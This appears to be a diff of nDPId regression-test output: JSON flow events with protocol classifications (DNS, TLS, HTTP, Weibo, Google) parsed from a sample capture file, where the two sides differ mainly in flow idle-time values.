+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073764,"flow_last_seen":1463089073764,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.170.63","src_port":47721,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00635{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073789,"flow_last_seen":1463089073789,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.170.63","src_port":47723,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073789,"flow_last_seen":1463089073789,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.170.63","src_port":47723,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089073287,"flow_last_seen":1463089073488,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":53466,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Alibaba","breed":"Acceptable","category":"Web"}} 00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089073287,"flow_last_seen":1463089073478,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":51440,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Alibaba","breed":"Acceptable","category":"Web"}} -00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073760,"flow_last_seen":1463089073760,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"42.156.184.19","src_port":52271,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by 
port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073760,"flow_last_seen":1463089073760,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"42.156.184.19","src_port":52271,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073760,"flow_last_seen":1463089073760,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"42.156.184.19","src_port":52272,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073760,"flow_last_seen":1463089073760,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"42.156.184.19","src_port":52272,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073788,"flow_last_seen":1463089073788,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"42.156.184.19","src_port":52274,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073788,"flow_last_seen":1463089073788,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"42.156.184.19","src_port":52274,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073760,"flow_last_seen":1463089073760,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"42.156.184.19","src_port":52271,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073760,"flow_last_seen":1463089073760,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"42.156.184.19","src_port":52271,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073760,"flow_last_seen":1463089073760,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"42.156.184.19","src_port":52272,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073760,"flow_last_seen":1463089073760,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"42.156.184.19","src_port":52272,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073788,"flow_last_seen":1463089073788,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"42.156.184.19","src_port":52274,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073788,"flow_last_seen":1463089073788,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"42.156.184.19","src_port":52274,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089072333,"flow_last_seen":1463089072444,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":53543,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} 
00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089072885,"flow_last_seen":1463089073423,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":41352,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} 00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073424,"flow_last_seen":1463089073424,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":16804,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089072046,"flow_last_seen":1463089072070,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.212.65","src_port":34699,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 
-00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089072046,"flow_last_seen":1463089072070,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.212.65","src_port":34699,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073488,"flow_last_seen":1463089073488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.174.1","src_port":48352,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073488,"flow_last_seen":1463089073488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.174.1","src_port":48352,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073488,"flow_last_seen":1463089073488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.174.1","src_port":48353,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073488,"flow_last_seen":1463089073488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.174.1","src_port":48353,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073537,"flow_last_seen":1463089073537,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.174.1","src_port":48356,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073537,"flow_last_seen":1463089073537,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.174.1","src_port":48356,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089072046,"flow_last_seen":1463089072070,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.212.65","src_port":34699,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089072046,"flow_last_seen":1463089072070,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.212.65","src_port":34699,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073488,"flow_last_seen":1463089073488,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.174.1","src_port":48352,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073488,"flow_last_seen":1463089073488,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.174.1","src_port":48352,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073488,"flow_last_seen":1463089073488,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.174.1","src_port":48353,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073488,"flow_last_seen":1463089073488,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.174.1","src_port":48353,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073537,"flow_last_seen":1463089073537,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.174.1","src_port":48356,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073537,"flow_last_seen":1463089073537,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.174.1","src_port":48356,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089071551,"flow_last_seen":1463089071612,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":131,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":7148,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} 00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089073289,"flow_last_seen":1463089073763,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":33822,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1463089067804,"flow_last_seen":1463089068491,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":618,"flow_tot_l4_payload_len":1566,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"216.58.210.14","dst_ip":"192.168.1.105","src_port":443,"dst_port":49361,"l4_proto":"udp","ndpi": {"confidence": {"2":"Match by 
IP"},"proto":"Google","breed":"Acceptable","category":"Web"}} 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1463089067804,"flow_last_seen":1463089068491,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":618,"flow_tot_l4_payload_len":1566,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"216.58.210.14","dst_ip":"192.168.1.105","src_port":443,"dst_port":49361,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1463089070841,"flow_last_seen":1463089071891,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":1081,"flow_avg_l4_payload_len":120,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"114.134.80.162","src_port":59119,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1463089070841,"flow_last_seen":1463089071198,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"114.134.80.162","src_port":59120,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1463089070841,"flow_last_seen":1463089071198,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"114.134.80.162","src_port":59120,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1463089071008,"flow_last_seen":1463089071348,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"114.134.80.162","src_port":59121,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1463089071008,"flow_last_seen":1463089071348,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"114.134.80.162","src_port":59121,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
